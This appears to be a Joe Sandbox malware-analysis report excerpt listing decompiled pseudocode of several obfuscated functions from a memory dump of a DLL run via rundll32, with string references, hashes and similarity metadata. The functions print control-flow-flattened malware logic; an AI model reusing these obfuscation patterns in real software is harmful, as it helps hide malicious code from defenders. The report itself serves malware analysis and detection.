0x00000000
0x1001eceb
0x1001ec25
0x1001ec39
0x1001ec3b
0x1001ec45
0x1001ec4a
0x00000000
0x1001ec4a
0x1001ec1f
0x1001ec17
0x1001ec0f
0x1001ec07
0x1001ebfb
0x1001ed0a
0x1001ed0a
0x1001ecda
0x00000000
0x1001ecda

Strings

,P, xrefs: 1001EB1A
ye@N, xrefs: 1001E9EC
a1, xrefs: 1001EB05
L/, xrefs: 1001EA9A
D$t0P, xrefs: 1001E9B7, 1001EBDD, 1001ECBC

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,P$D$t0P$L/$a1$ye@N
API String ID: 0-2563774939
Opcode ID: 54c61307b9ab6fb612093f71a7fc55ebc136ee3ff4246211bf70baf14f173822
Instruction ID: 166763ed96be60b38ffae6a92f6eb05608e8f5e248f7f2589ae4f9e53e9cd2e4
Opcode Fuzzy Hash: 54c61307b9ab6fb612093f71a7fc55ebc136ee3ff4246211bf70baf14f173822
Instruction Fuzzy Hash: E88146716083819BD354CF25D98941FBBE2FBC4758F50492DF98A9A2A0C7B5CA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 1000F54C, Relevance: 6.4, Strings: 5, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E1000F54C(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				unsigned int _v612;
				signed int _v616;
				void* __ecx;
				void* _t111;
				signed int _t123;
				signed int _t125;
				void* _t129;
				signed int _t134;
				intOrPtr* _t153;
				signed int _t154;
				signed int _t155;
				signed int* _t159;

				_push(_a8);
				_t153 = __edx;
				_push(_a4);
				_push(__edx);
				E10017B8C(_t111);
				_v564 = _v564 & 0x00000000;
				_t159 =  &(( &_v616)[4]);
				_v560 = _v560 & 0x00000000;
				_v572 = 0x273034;
				_t129 = 0x394c56d2;
				_v568 = 0x217c32;
				_v612 = 0x1fc1;
				_t154 = 0x60;
				_v612 = _v612 * 0x21;
				_v612 = _v612 + 0xffff8df1;
				_v612 = _v612 >> 0xc;
				_v612 = _v612 ^ 0x000018b9;
				_v600 = 0x13dc;
				_v600 = _v600 ^ 0x423f48ae;
				_v600 = _v600 + 0xffff8459;
				_v600 = _v600 ^ 0x423ea144;
				_v596 = 0x71d3;
				_v596 = _v596 << 0xb;
				_v596 = _v596 << 7;
				_v596 = _v596 ^ 0xc74c3395;
				_v608 = 0xe129;
				_v608 = _v608 * 0x25;
				_v608 = _v608 << 1;
				_v608 = _v608 * 0x71;
				_v608 = _v608 ^ 0x1cba84be;
				_v592 = 0x2c84;
				_v592 = _v592 << 1;
				_v592 = _v592 ^ 0xb20501f5;
				_v592 = _v592 ^ 0xb205757f;
				_v580 = 0x20bd;
				_v580 = _v580 + 0xffff087a;
				_v580 = _v580 ^ 0xffff1f13;
				_v616 = 0x4d3c;
				_v616 = _v616 + 0xffff0f44;
				_v616 = _v616 + 0x91bb;
				_v616 = _v616 >> 5;
				_v616 = _v616 ^ 0x07ff99da;
				_v588 = 0x5b67;
				_v588 = _v588 / _t154;
				_v588 = _v588 ^ 0x00006bc9;
				_v576 = 0xc176;
				_v576 = _v576 ^ 0x9ddc14d6;
				_v576 = _v576 ^ 0x9ddcfeb9;
				_v604 = 0x2805;
				_v604 = _v604 ^ 0x18f0d372;
				_t155 = 0x30;
				_t156 = _v588;
				_v604 = _v604 / _t155;
				_v604 = _v604 * 0x21;
				_v604 = _v604 ^ 0x1125af14;
				_v584 = 0x956e;
				_v584 = _v584 ^ 0x55fbc535;
				_v584 = _v584 ^ 0x55fb5059;
				L1:
				while(_t129 != 0xb2fb393) {
					if(_t129 == 0x234929b6) {
						_t125 =  *_t153( &_v556, _a4);
						asm("sbb ecx, ecx");
						_t134 =  ~_t125 & 0xf690a6a6;
						L10:
						_t129 = _t134 + 0x30a5c660;
						continue;
					}
					if(_t129 == 0x27366d06) {
						_t125 = E10012B6E( &_v556, _t156, _v592, _v580, _v616);
						_t159 =  &(_t159[3]);
						L9:
						asm("sbb ecx, ecx");
						_t134 =  ~_t125 & 0xf2a36356;
						goto L10;
					}
					if(_t129 == 0x2ff5d71b) {
						_v556 = 0x22c;
						_t125 = E1000E36F( &_v556, _v596, _t156, _v608);
						goto L9;
					}
					if(_t129 == 0x30a5c660) {
						return E1000ADFC(_v588, _v576, _t156, _v604);
					}
					if(_t129 != 0x394c56d2) {
						L16:
						if(_t129 != 0x151b7dd7) {
							continue;
						}
						return _t125;
					}
					_t129 = 0xb2fb393;
				}
				_push(_t129);
				_push(_t129);
				_t123 = E1001D474(_v584);
				_t156 = _t123;
				if(_t123 == 0xffffffff) {
					_t129 = 0x151b7dd7;
					goto L16;
				}
				_t129 = 0x2ff5d71b;
				goto L1;
			}

0x1000f556
0x1000f55d
0x1000f55f
0x1000f566
0x1000f568
0x1000f56d
0x1000f572
0x1000f575
0x1000f57c
0x1000f584
0x1000f589
0x1000f596
0x1000f5aa
0x1000f5ad
0x1000f5b1
0x1000f5b9
0x1000f5be
0x1000f5c6
0x1000f5ce
0x1000f5d6
0x1000f5de
0x1000f5e6
0x1000f5ee
0x1000f5f3
0x1000f5f8
0x1000f600
0x1000f60d
0x1000f611
0x1000f61a
0x1000f61e
0x1000f626
0x1000f62e
0x1000f632
0x1000f63a
0x1000f642
0x1000f64a
0x1000f652
0x1000f65a
0x1000f662
0x1000f66a
0x1000f672
0x1000f677
0x1000f67f
0x1000f68f
0x1000f693
0x1000f69b
0x1000f6a3
0x1000f6ab
0x1000f6b3
0x1000f6bb
0x1000f6c7
0x1000f6ca
0x1000f6ce
0x1000f6d7
0x1000f6db
0x1000f6e3
0x1000f6eb
0x1000f6f3
0x00000000
0x1000f6fb
0x1000f709
0x1000f787
0x1000f78d
0x1000f78f
0x1000f75b
0x1000f75b
0x00000000
0x1000f75b
0x1000f711
0x1000f771
0x1000f776
0x1000f74f
0x1000f753
0x1000f755
0x00000000
0x1000f755
0x1000f719
0x1000f740
0x1000f748
0x00000000
0x1000f74e
0x1000f71d
0x00000000
0x1000f7e3
0x1000f729
0x1000f7c2
0x1000f7c8
0x00000000
0x00000000
0x00000000
0x1000f7c8
0x1000f72f
0x1000f72f
0x1000f7a3
0x1000f7a4
0x1000f7a5
0x1000f7aa
0x1000f7b1
0x1000f7bd
0x00000000
0x1000f7bd
0x1000f7b3
0x00000000

Strings

), xrefs: 1000F600
2|!, xrefs: 1000F589
40', xrefs: 1000F57C
g[, xrefs: 1000F67F
<M, xrefs: 1000F65A

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$2|!$40'$<M$g[
API String ID: 0-2269409361
Opcode ID: 97faa131daff5194895e370456d54cf966f3132aa0ad9cffd3763bff10c97cca
Instruction ID: 6111ab0a8aafd2720cc4dba905c01e6952e430daf5e4da26d986f680e84a003a
Opcode Fuzzy Hash: 97faa131daff5194895e370456d54cf966f3132aa0ad9cffd3763bff10c97cca
Instruction Fuzzy Hash: 6A61657500C3429FE758CE21D48982FBBE1FBC4398F104A1EF496962A0C7B596098F87

Uniqueness

Uniqueness Score: -1.00%

Function 1001CB58, Relevance: 6.4, Strings: 5, Instructions: 151
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1001CB58(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				intOrPtr _t120;
				signed int _t126;
				signed int _t134;
				void* _t138;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				signed int* _t159;

				_push(_a24);
				_push(0);
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_t120 = E10017B8C(0);
				_v8 = _t120;
				_t156 = _t120;
				_v4 = _t120;
				_v16 = 0x5cd1bd;
				_t159 =  &(( &_v64)[8]);
				_v12 = 0x6020a9;
				_t138 = 0x11efafcc;
				_v32 = 0xef85;
				_v32 = _v32 + 0xffffe456;
				_v32 = _v32 ^ 0x00009ff4;
				_v48 = 0x2be8;
				_t152 = 0x34;
				_v48 = _v48 * 0xb;
				_v48 = _v48 + 0x3281;
				_v48 = _v48 ^ 0x0002063f;
				_v52 = 0xafd5;
				_v52 = _v52 + 0xffff82e5;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x032bcc72;
				_v64 = 0x2be8;
				_v64 = _v64 + 0xffffa8fe;
				_v64 = _v64 / _t152;
				_v64 = _v64 + 0xffffd881;
				_v64 = _v64 ^ 0x04ec239a;
				_v36 = 0xe344;
				_t153 = 0x64;
				_v36 = _v36 / _t153;
				_v36 = _v36 ^ 0x0000153e;
				_v44 = 0x5312;
				_v44 = _v44 | 0x0ef7aa23;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x00070c70;
				_v28 = 0xa6ef;
				_t126 = _v28;
				_t154 = 0xb;
				_t150 = _t126 % _t154;
				_v28 = _t126 / _t154;
				_v28 = _v28 ^ 0x00006d0c;
				_v56 = 0xb27b;
				_v56 = _v56 * 0x1c;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x02708312;
				_v40 = 0x7338;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 + 0x9b8a;
				_v40 = _v40 ^ 0x0000c337;
				_v20 = 0xbda;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00004b69;
				_v24 = 0xcd71;
				_v24 = _v24 >> 0xc;
				_v24 = _v24 ^ 0x00002b79;
				_t155 = _v20;
				_v60 = 0x3037;
				_v60 = _v60 | 0xc7dc927f;
				_v60 = _v60 >> 9;
				_v60 = _v60 ^ 0xec2e3ec1;
				_v60 = _v60 ^ 0xec4d9672;
				do {
					while(_t138 != 0x11efafcc) {
						if(_t138 == 0x17b35050) {
							_push(_t138);
							_t156 = E1000A0AD(_t155 + _t155, _t150);
							if(_t156 != 0) {
								_t138 = 0x2182500a;
								continue;
							}
						} else {
							if(_t138 == 0x19df0965) {
								_t150 = _v32;
								_t134 = E100111F0(0, _v32, _v48, 0xffffffff, _a24, 0, _a12, _v52, _v64, _t138, _v36);
								_t155 = _t134;
								_t159 =  &(_t159[9]);
								if(_t134 != 0) {
									_t138 = 0x17b35050;
									continue;
								}
							} else {
								if(_t138 != 0x2182500a) {
									goto L12;
								} else {
									E100111F0(_t156, _v56, _v40, 0xffffffff, _a24, _t155, _a12, _v20, _v24, _t138, _v60);
								}
							}
						}
						L6:
						return _t156;
					}
					_t138 = 0x19df0965;
					L12:
				} while (_t138 != 0x112ca634);
				goto L6;
			}

0x1001cb5f
0x1001cb65
0x1001cb66
0x1001cb68
0x1001cb6c
0x1001cb70
0x1001cb74
0x1001cb76
0x1001cb7b
0x1001cb7f
0x1001cb81
0x1001cb8a
0x1001cb92
0x1001cb95
0x1001cb9d
0x1001cba2
0x1001cbaa
0x1001cbb2
0x1001cbba
0x1001cbc5
0x1001cbc8
0x1001cbcc
0x1001cbd4
0x1001cbdc
0x1001cbe4
0x1001cbec
0x1001cbf1
0x1001cbf9
0x1001cbff
0x1001cc0f
0x1001cc13
0x1001cc1b
0x1001cc23
0x1001cc2f
0x1001cc34
0x1001cc3a
0x1001cc42
0x1001cc4a
0x1001cc52
0x1001cc57
0x1001cc5f
0x1001cc67
0x1001cc6b
0x1001cc6c
0x1001cc6e
0x1001cc72
0x1001cc7a
0x1001cc87
0x1001cc93
0x1001cc98
0x1001cca0
0x1001cca8
0x1001ccad
0x1001ccb5
0x1001ccbd
0x1001ccc5
0x1001ccca
0x1001ccd2
0x1001ccda
0x1001ccdf
0x1001cce7
0x1001ccf0
0x1001ccfd
0x1001cd05
0x1001cd0a
0x1001cd12
0x1001cd1a
0x1001cd1a
0x1001cd28
0x1001cdb8
0x1001cdc1
0x1001cdc6
0x1001cdc8
0x00000000
0x1001cdc8
0x1001cd2e
0x1001cd30
0x1001cd97
0x1001cd9b
0x1001cda0
0x1001cda2
0x1001cda7
0x1001cda9
0x00000000
0x1001cda9
0x1001cd32
0x1001cd38
0x00000000
0x1001cd3e
0x1001cd63
0x1001cd68
0x1001cd38
0x1001cd30
0x1001cd6c
0x1001cd74
0x1001cd74
0x1001cdd2
0x1001cdd4
0x1001cdd4
0x00000000

Strings

70, xrefs: 1001CCF0
8s, xrefs: 1001CCA0
y+, xrefs: 1001CCDF
iK, xrefs: 1001CCCA
D, xrefs: 1001CC23

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 70$8s$D$iK$y+
API String ID: 0-3581635242
Opcode ID: e4da605cac189cb1e3f0c5929f7df62af95bd3137ac56ddfd44896faeb0f3670
Instruction ID: ed0e9c74af962b3d3819339633207a66c9b957c3cc8d565b322e322de617d21a
Opcode Fuzzy Hash: e4da605cac189cb1e3f0c5929f7df62af95bd3137ac56ddfd44896faeb0f3670
Instruction Fuzzy Hash: 6C615571508341ABD754CF21D88991FBFE1FBC47A8F544A2DF4869A2A0D375CA89CB83

Uniqueness

Uniqueness Score: -1.00%

Function 1001B598, Relevance: 6.4, Strings: 5, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001B598() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t126;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				void* _t157;
				signed int _t158;
				signed int* _t159;

				_t159 =  &_v564;
				_v548 = 0xebad;
				_v548 = _v548 << 0xf;
				_t135 = 0x2d1ef193;
				_v548 = _v548 ^ 0x75d6ae98;
				_v552 = 0x1f02;
				_t152 = 0x36;
				_v552 = _v552 / _t152;
				_v552 = _v552 << 6;
				_t157 = 0;
				_v552 = _v552 + 0x93a;
				_v552 = _v552 ^ 0x00006434;
				_v524 = 0x3d4;
				_v524 = _v524 ^ 0x38d085d3;
				_v524 = _v524 ^ 0x38d083ad;
				_v532 = 0x2444;
				_v532 = _v532 + 0xffff2ad1;
				_v532 = _v532 ^ 0xffff4fc9;
				_v540 = 0x3e33;
				_v540 = _v540 >> 4;
				_t153 = 0x64;
				_t134 = _v548;
				_t158 = _v548;
				_v540 = _v540 * 0x6f;
				_v540 = _v540 ^ 0x0001ad1c;
				_v564 = 0x45df;
				_v564 = _v564 / _t153;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x002c8eb2;
				_v544 = 0x832f;
				_v544 = _v544 << 4;
				_v544 = _v544 ^ 0x3712ea14;
				_v544 = _v544 ^ 0x371af531;
				_v560 = 0xc4c2;
				_v560 = _v560 << 3;
				_v560 = _v560 ^ 0x3329262a;
				_v560 = _v560 ^ 0x3b46974f;
				_v560 = _v560 ^ 0x0869e178;
				_v536 = 0x6744;
				_v536 = _v536 | 0x42cbc771;
				_v536 = _v536 >> 0xb;
				_v536 = _v536 ^ 0x000840ba;
				_v528 = 0x56d0;
				_t154 = 0x37;
				_v528 = _v528 / _t154;
				_v528 = _v528 ^ 0x000058c1;
				_v556 = 0x4303;
				_t155 = 0xc;
				_t156 = _v548;
				_v556 = _v556 / _t155;
				_v556 = _v556 << 6;
				_v556 = _v556 | 0x83717d5a;
				_v556 = _v556 ^ 0x83713236;
				do {
					while(_t135 != 0x711c94f) {
						if(_t135 == 0x281e52ae) {
							_v564 = 0xb8a1;
							_v564 = _v564 * 0x5a;
							_v564 = _v564 ^ 0xdd190b6b;
							_v564 = _v564 ^ 0xf77ee313;
							__eflags = _t134 - _v564;
							_t157 =  ==  ? 1 : _t157;
						} else {
							if(_t135 == 0x28fa8075) {
								_t131 = E100040A7(_v564,  &_v520, _v544, _v560, _v536);
								_t159 =  &(_t159[3]);
								_t158 = _t131;
								_t135 = 0x36ee9406;
								continue;
							} else {
								if(_t135 == 0x2d1ef193) {
									_t135 = 0x711c94f;
									continue;
								} else {
									if(_t135 == 0x35601137) {
										_push(_t135);
										_t132 = E10018A24(_v552,  &_v520, __eflags, _v524, _v532, _v540, _t156);
										_t159 =  &(_t159[5]);
										__eflags = _t132;
										if(__eflags != 0) {
											_t135 = 0x28fa8075;
											continue;
										}
									} else {
										if(_t135 != 0x36ee9406) {
											goto L15;
										} else {
											_t134 = E100117A2(_t158, _v528, _v556);
											_t135 = 0x281e52ae;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t157;
					}
					_t126 = E10003356();
					_t156 = _t126;
					__eflags = _t126;
					if(__eflags == 0) {
						_t135 = 0x27755518;
						goto L15;
					} else {
						_t135 = 0x35601137;
						continue;
					}
					goto L18;
					L15:
					__eflags = _t135 - 0x27755518;
				} while (__eflags != 0);
				goto L18;
			}

0x1001b598
0x1001b59e
0x1001b5a8
0x1001b5ad
0x1001b5b2
0x1001b5ba
0x1001b5cc
0x1001b5d1
0x1001b5d7
0x1001b5dc
0x1001b5de
0x1001b5e6
0x1001b5ee
0x1001b5f6
0x1001b5fe
0x1001b606
0x1001b60e
0x1001b616
0x1001b61e
0x1001b626
0x1001b630
0x1001b633
0x1001b637
0x1001b63b
0x1001b63f
0x1001b647
0x1001b657
0x1001b65b
0x1001b660
0x1001b668
0x1001b670
0x1001b675
0x1001b67d
0x1001b685
0x1001b68d
0x1001b692
0x1001b69a
0x1001b6a2
0x1001b6aa
0x1001b6b2
0x1001b6ba
0x1001b6bf
0x1001b6c7
0x1001b6d3
0x1001b6d8
0x1001b6de
0x1001b6e6
0x1001b6f2
0x1001b6f5
0x1001b6f9
0x1001b6fd
0x1001b702
0x1001b70a
0x1001b712
0x1001b712
0x1001b724
0x1001b7f5
0x1001b802
0x1001b808
0x1001b811
0x1001b81d
0x1001b81f
0x1001b72a
0x1001b730
0x1001b7b5
0x1001b7ba
0x1001b7bd
0x1001b7bf
0x00000000
0x1001b732
0x1001b738
0x1001b797
0x00000000
0x1001b73a
0x1001b740
0x1001b767
0x1001b77d
0x1001b782
0x1001b785
0x1001b787
0x1001b78d
0x00000000
0x1001b78d
0x1001b742
0x1001b748
0x00000000
0x1001b74e
0x1001b75e
0x1001b760
0x00000000
0x1001b760
0x1001b748
0x1001b740
0x1001b738
0x1001b730
0x1001b823
0x1001b82e
0x1001b82e
0x1001b7cd
0x1001b7d2
0x1001b7d4
0x1001b7d6
0x1001b7e2
0x00000000
0x1001b7d8
0x1001b7d8
0x00000000
0x1001b7d8
0x00000000
0x1001b7e7
0x1001b7e7
0x1001b7e7
0x00000000

Strings

*&)3, xrefs: 1001B692
Dg, xrefs: 1001B6AA
4d, xrefs: 1001B5E6
D$, xrefs: 1001B606
3>, xrefs: 1001B61E

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *&)3$3>$4d$D$$Dg
API String ID: 0-1744236248
Opcode ID: 3853b8ef6381e0484490cd790ca1073661cacda29dd99c15f507afcf66c83a09
Instruction ID: ac03e3bb6e50dbacae28f372835fff677f24a59ef142faa8d816a212b6b8c48e
Opcode Fuzzy Hash: 3853b8ef6381e0484490cd790ca1073661cacda29dd99c15f507afcf66c83a09
Instruction Fuzzy Hash: 7E5112715087429BD398CE25C48941FBBE2FFC4798F504A1DF4969A2A1D7B4CA89CB83

Uniqueness

Uniqueness Score: -1.00%

Function 1000799F, Relevance: 6.4, Strings: 5, Instructions: 117
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000799F(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr _t165;

				_v44 = 0x2ace;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x0000f65f;
				_v20 = 0xb4b6;
				_v20 = _v20 + 0x540d;
				_t143 = 0x3e;
				_v20 = _v20 / _t143;
				_t144 = 0x32;
				_v20 = _v20 / _t144;
				_v20 = _v20 ^ 0x0000569e;
				_v24 = 0x427d;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x1a96;
				_t145 = 0xa;
				_v24 = _v24 / _t145;
				_v24 = _v24 ^ 0x00354436;
				_v12 = 0x298e;
				_v12 = _v12 + 0xcdda;
				_v12 = _v12 + 0xffff8c87;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00000668;
				_v28 = 0x449d;
				_v28 = _v28 >> 3;
				_t146 = 0x3d;
				_v28 = _v28 / _t146;
				_v28 = _v28 + 0xffff700c;
				_v28 = _v28 ^ 0xffff787b;
				_v32 = 0xfca1;
				_v32 = _v32 + 0xda77;
				_t147 = 0x38;
				_v32 = _v32 * 0x50;
				_v32 = _v32 + 0xc0d;
				_v32 = _v32 ^ 0x00931447;
				_v8 = 0xe34f;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x872ea3fb;
				_v8 = _v8 / _t147;
				_v8 = _v8 ^ 0x02699baa;
				_v36 = 0x736f;
				_v36 = _v36 + 0xffffeeb1;
				_t148 = 0x2c;
				_v36 = _v36 / _t148;
				_v36 = _v36 ^ 0x000012ed;
				_v16 = 0xd3fc;
				_v16 = _v16 ^ 0x1f84dc3a;
				_v16 = _v16 + 0x2838;
				_v16 = _v16 + 0xffff3aae;
				_v16 = _v16 ^ 0x1f830afd;
				_v40 = 0xeff7;
				_v40 = _v40 * 0x34;
				_v40 = _v40 * 0x7b;
				_v40 = _v40 ^ 0x176b51a3;
				_t165 =  *0x10021fd8; // 0x0
				_t138 = E10001B9D(_v28, _v32, E100040A7(_v44, _t165 + 0x22c, _v20, _v24, _v12), _a4 + 0x2c);
				_t176 = _t138;
				if(_t138 != 0) {
					E10001664(_t176, _a8, _v8, _v36);
					E10003D8C( &_v564, _v16, _v40);
				}
				return 1;
			}

0x100079a8
0x100079b1
0x100079b5
0x100079bc
0x100079c3
0x100079d0
0x100079d5
0x100079dd
0x100079e2
0x100079e7
0x100079ee
0x100079f5
0x100079f9
0x10007a03
0x10007a08
0x10007a0d
0x10007a14
0x10007a1b
0x10007a22
0x10007a29
0x10007a2d
0x10007a34
0x10007a3b
0x10007a42
0x10007a47
0x10007a4c
0x10007a53
0x10007a5a
0x10007a61
0x10007a6c
0x10007a6f
0x10007a72
0x10007a79
0x10007a80
0x10007a87
0x10007a8a
0x10007a98
0x10007a9b
0x10007aa2
0x10007aa9
0x10007ab3
0x10007ab6
0x10007ab9
0x10007ac0
0x10007ac7
0x10007ace
0x10007ad5
0x10007adc
0x10007ae3
0x10007aee
0x10007af5
0x10007af8
0x10007b08
0x10007b2a
0x10007b32
0x10007b34
0x10007b47
0x10007b58
0x10007b5d
0x10007b67

Strings

8(, xrefs: 10007ACE
T, xrefs: 100079C3
O, xrefs: 10007A80
os, xrefs: 10007AA2
6D5, xrefs: 10007A0D

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: T$6D5$8($O$os
API String ID: 1586166983-1387091587
Opcode ID: be6e6c4cc8892ae613b9d73cc50bd2fa810913f63f64537371f9c9aea64e6694
Instruction ID: 415965c0b4ca58ab0c29d0f6fc56626fa69bdd65f711e41d42e6f078a51a596a
Opcode Fuzzy Hash: be6e6c4cc8892ae613b9d73cc50bd2fa810913f63f64537371f9c9aea64e6694
Instruction Fuzzy Hash: A351E572D0120EDBEF04CFA1C94A9EEBBB2FB44318F208159D1117A294D7B95B56CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10001EF9, Relevance: 6.4, Strings: 5, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E10001EF9(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v596;
				void* _t121;
				void* _t129;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t121);
				_v68 = _v68 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v76 = 0x50f95;
				_v72 = 0x1d3f0;
				_v8 = 0x9562;
				_v8 = _v8 << 0xe;
				_v8 = _v8 + 0x1af1;
				_v8 = _v8 + 0xd79c;
				_v8 = _v8 ^ 0x25596ec8;
				_v60 = 0xe933;
				_v60 = _v60 + 0xffff2a97;
				_v60 = _v60 ^ 0x00003f35;
				_v16 = 0x2289;
				_v16 = _v16 << 0x10;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0022f682;
				_v40 = 0x3e12;
				_v40 = _v40 ^ 0x69197283;
				_v40 = _v40 ^ 0x691957c8;
				_v56 = 0xb45d;
				_v56 = _v56 | 0x13457da6;
				_v56 = _v56 ^ 0x1345fce2;
				_v28 = 0xfa2d;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x000035dc;
				_v12 = 0x1333;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xffffa55e;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00006f40;
				_v20 = 0xdd45;
				_v20 = _v20 >> 2;
				_v20 = _v20 | 0x72f2fa26;
				_v20 = _v20 ^ 0x72f2ad75;
				_v36 = 0x78e6;
				_v36 = _v36 << 2;
				_v36 = _v36 ^ 0x0001fbf0;
				_v32 = 0xc878;
				_v32 = _v32 ^ 0x7eaae5a6;
				_v32 = _v32 ^ 0x7eaa2b70;
				_v24 = 0x30f5;
				_t135 = 0x25;
				_v24 = _v24 / _t135;
				_t136 = 0x4f;
				_v24 = _v24 / _t136;
				_v24 = _v24 ^ 0x00000324;
				_v48 = 0xd206;
				_t137 = 0x6d;
				_v48 = _v48 / _t137;
				_v48 = _v48 ^ 0x000003f9;
				_v52 = 0xd2b5;
				_v52 = _v52 | 0x614aef3f;
				_v52 = _v52 ^ 0x614a88d4;
				_v44 = 0x5f63;
				_v44 = _v44 | 0x04725c79;
				_t102 =  &_v44;
				_v44 = _v44 ^ 0x04726790;
				_push(_v40);
				_push(_v16);
				_push(_v60);
				_t129 = E1000B871(0x10001060, _v8,  *_t102);
				E1001C78C(_v56,  *_t102, _v28, _v12, _v20,  &_v596, _a4);
				E1000717B(_v36, _v32, _v24, _t129, _v48);
				return E10003D8C( &_v596, _v52, _v44);
			}

0x10001f03
0x10001f06
0x10001f07
0x10001f08
0x10001f0d
0x10001f13
0x10001f17
0x10001f1e
0x10001f25
0x10001f2c
0x10001f30
0x10001f37
0x10001f3e
0x10001f45
0x10001f4c
0x10001f53
0x10001f5a
0x10001f61
0x10001f65
0x10001f69
0x10001f70
0x10001f77
0x10001f7e
0x10001f85
0x10001f8c
0x10001f93
0x10001f9a
0x10001fa1
0x10001fa5
0x10001fac
0x10001fb3
0x10001fb7
0x10001fbe
0x10001fc2
0x10001fc9
0x10001fd0
0x10001fd4
0x10001fdb
0x10001fe2
0x10001fe9
0x10001fed
0x10001ff4
0x10001ffb
0x10002002
0x10002009
0x10002015
0x1000201a
0x10002022
0x10002027
0x1000202c
0x10002033
0x1000203d
0x10002045
0x10002048
0x1000204f
0x10002056
0x1000205d
0x10002064
0x1000206b
0x10002072
0x10002072
0x10002079
0x1000207c
0x1000207f
0x10002085
0x100020a7
0x100020b9
0x100020d6

Strings

@o, xrefs: 10001FC2
c_, xrefs: 10002064
5?, xrefs: 10001F53
x, xrefs: 10001FE2
?Ja, xrefs: 10002056

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

